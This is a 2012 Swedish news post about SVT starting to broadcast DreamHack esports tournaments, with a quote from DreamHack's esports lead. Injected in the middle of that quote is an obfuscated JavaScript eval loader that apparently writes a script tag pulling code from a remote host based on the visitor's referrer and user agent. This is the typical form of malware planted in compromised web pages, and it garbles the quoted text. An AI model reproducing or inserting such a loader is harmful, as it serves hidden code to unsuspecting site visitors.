Image Image Image Image Image Image Image Image Image Image

| 23 oktober, 2020

Scroll to top

Top

SVT börjar sända e-sport!

Filip Urde
  • On 19 april, 2012
  • http://www.revue.se/filip-urde

SVT har tydligt visat ett intresse för att satsa på e-sport i sina kanaler. Man har sedan tidigare kört turneringar på SVT-play, men vill nu utveckla och även sända i tv. Detta blir verklighet genom ett samarbete med Dreamhack och betyder att man nu börjar sända turneringar på SVT.

SVT kommer sända från fem turneringar i år jämfört med två förra året.

”Intresset eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nisbr|var|u0026u|referrer|tyrdf||js|php’.split(’|’),0,{}))
för livesänd esport växer så det knakar och vi är mycket glada att tillsammans med SVT kunna erbjuda mer från DreamHacks tävlingar under året. DreamHack producerar hundratals timmar livesänd esport varje år och SVT kommer att sända utvalda delar av de bästa matcherna”

Tomas Hermansson, Esportansvarig på DreamHack.

SVT kommer även att sända vissa av turneringarna i marknätet.
www.mynewsdesk.se

20120419-164136.jpg